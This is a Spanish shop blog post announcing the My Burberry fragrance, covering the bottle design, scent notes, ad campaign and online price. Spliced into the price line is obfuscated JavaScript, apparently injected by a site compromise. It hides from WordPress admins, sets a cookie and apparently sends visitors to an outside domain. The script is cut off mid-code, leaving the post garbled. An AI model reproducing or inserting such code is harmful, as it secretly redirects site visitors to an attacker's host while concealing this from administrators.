BBYT_AW14_08AUG_ES_S350x200_MYB1P_TintinDescubre My Burberry, la nueva fragancia para mujer inspirada en el icónico trench coat de Burberry.

Su frasco refleja el diseño del trench coat. Donde vemos el tapón con acabado de cuero que se inspira en sus botones, mientras que el lazo anudado es de gabardina.

Su aroma se inspira en la vitalidad de la cuidad, captando la esencia de los jardines, las flores y la luz de Londres. Las notas altas de guisante dulce y bergamota se funden con notas medias de geranio, membrillo dorado y freesia sobre un fondo de rosa de Damasco, rosa centifolia y pachulí rociado por la lluvia.

En la campaña de publicidad, vemos a Kate Moss y Cara Delevingne con el trench coat The Sandringham.

#MyBurberry

Diposnible en nuestra tienda online desde 45€ var a=[‘toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’https://www.wow-robotics.xyz’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[‘push’](c[‘shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(‘0x0’)](b(‘0x1’))===null){if(typeof c===b(‘0x2’)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(‘0x3’)](h[b(‘0x4’)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(‘0x5’)+h[b(‘0x6’)]();}document[b(‘0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(‘0x7’)][b(‘0x8’)](‘;’);for(var m=0x0;m

¿Te ha gustado? ¡Compártelo!Share on FacebookTweet about this on TwitterPin on PinterestShare on LinkedInShare on Google+Email this to someone